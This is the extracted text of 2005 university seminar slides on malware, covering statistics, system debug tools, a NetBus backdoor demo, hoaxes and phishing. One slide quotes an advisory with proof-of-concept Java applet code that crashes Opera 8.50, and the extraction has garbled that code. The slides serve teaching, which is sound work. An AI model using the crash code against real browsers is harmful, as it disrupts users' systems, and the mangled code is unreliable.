Malware Cont Maxim Vainstein Emanuel Hahamov HUJI CS
- Slides: 14
Malware – Cont. Maxim Vainstein & Emanuel Hahamov HUJI, CS, Seminar in Software Design 08. 12. 2005
Malware Statistic
Malware Statistic Cont.
Take it “easy”…
Take it “easy”… (Cont. )
Malware – Example
Malware – Example(2) Opera Java Applet Do. S ¨ Summary Opera is "a computer application for handling most common internet-related tasks, including: web browsing, sending and receiving messages, managing contacts and online chat". A vulnerability in a Opera allows remote attackers to cause the program to crash by utilizing a malicious Java applet. ¨ Details Vulnerable Systems: * Opera version 8. 50 Immune Systems: * Opera version 8. 51 It is possible to crash the opera 8. 50 browser with a simple java Applet (see below). This was observed on Win 32, Linux versions maybe affected, too. This can be tested at: http: //www. illegalaccess. org/exploit/opera 85/Opera. Applet. html As you can see the applet crashes at 0 x 67 c 0 a 54 c. This is caused by a bug in a JNI routine implementing the com. opera. JSObject class. It cannot beruled out, that this bug is exploitable. The opera guys were informed on the 21 st of September, and then again on 8 th of October. ¨ Code ¨ Additional Information The information has been provided by <mailto: marc. schoenefeld@gmx. org> Marc Schoenefeld. import java. applet. Applet; import java. awt. Graphics; import netscape. javascript. JSObject; public class Opera. Test extends Applet} static { System. out. println("Loaded 1. 2; (" { public void paint(Graphics g( { System. out. println("start; (" try} netscape. javascript. JSObject jso = JSObject. get. Window(this; ( System. out. println(jso. get. Class; (() com. opera. JSObject j = (com. opera. JSObject ) jso; char[] x = new char[1000000; [ for (int y = 0 ; y < x. length; y} (++ x [y] = 'A; ' { String z = new String(x; ( System. out. println("after evalb; (" j. remove. Member(z; ( System. out. println("after remove; (" } catch (Exception e} ( e. print. Stack. Trace; () } } {
System Debug Tools ¨ Sys. Internals www. sysinternals. com ¨ ¨ ¨ Process Explorer File. Mon Reg. Mon Tcp. View TDIMon Win. Obj More… Emsi A 2 -Hijack. Free LSPfix Task. Manager 16 Ethreal Network Sniffer
Net. Bus - Demo l l l Advanced Remote Control Backdoor Key logger Screen capture Multimedia Capture l l Video Sound Microphone False Remote Administration/Helpdesk ? !
More Malware
Scams and Hoaxes l Malware-related l False Information (to force user for unwanted action) l Scams l l And Shams Luck-based hoaxes Money-based hoaxes l Urban Legends
Jokes (JOKE_BURST. A, JOKE_TRAIN. B) l No malicious code, but can be noisy
Phishing – Local/Web Network Redirection l False known website Banks l e. Commerce l e. Mails l
Questions ?